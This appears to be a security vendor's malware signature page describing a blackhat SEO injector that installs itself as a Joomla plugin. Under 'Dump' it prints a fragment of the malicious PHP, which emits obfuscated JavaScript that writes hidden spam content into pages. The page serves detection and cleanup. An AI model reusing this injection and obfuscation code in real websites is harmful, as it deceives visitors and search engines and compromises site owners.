Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.spam-seo.joomla-injector.001

php.spam-seo.joomla-injector.001

Blackhat SEO is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as malicious iframe, or redirect) is visible in the browser, not the malicious code itself.
This code installs itself as a Joomla plugin and injects malicious JavaScript code into the target page, the plugin also uses a obfuscation function to hide the code from the untrained eye.

Affecting

Any vulnerable Joomla based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

You can contact Sucuri to help you with the infection removal.

Dump

$scriptContent = $this->getLongTail().'<script language="JavaScript">var _0xa113=["'.join('", "', $this->obfuscateJavaScript('<style>.'.$className.'{position:absolute;top:-9999px}</style>')).'","x6Cx65x6Ex67x74x68","","x63x68x61x72x41x74","x66x72x6Fx6Dx43x68x61x72x43x6Fx64x65","x6Ax6Fx69x6E","x77x72x69x74x65"];function _0xad78(){var _0xee8bx2=0,_0xee8bx3,_0xee8bx4,_0xee8bx5,_0xee8bx6;var _0xee8bx7= new Array(_0xa113[0],_0xa113[1],_0xa113[2],_0xa113[3]);var _0xee8bx8=_0xee8bx7[_0xa113[4]];while(++_0xee8bx2<=_0xee8bx8){_0xee8bx3=_0xee8bx7[_0xee8bx8-_0xee8bx2];_0xee8bx5=_0xee8bx6=_0xa113[5];for(_0xee8bx4=0;_0xee8bx4<_0xee8bx3[_0xa113[4]];){_0xee8bx5+=_0xee8bx3[_0xa113[6]](_0xee8bx4++);if(_0xee8bx5[_0xa113[4]]==2){_0xee8bx6+=String[_0xa113[7]](parseInt(_0xee8bx5)+35-_0xee8bx8+_0xee8bx2);_0xee8bx5=_0xa113[5];} ;} ;_0xee8bx7[_0xee8bx8-_0xee8bx2]=_0xee8bx6;} ;document[_0xa113[9]](_0xee8bx7[_0xa113[8]](_0xa113[5]));} ;_0xad78();</script>'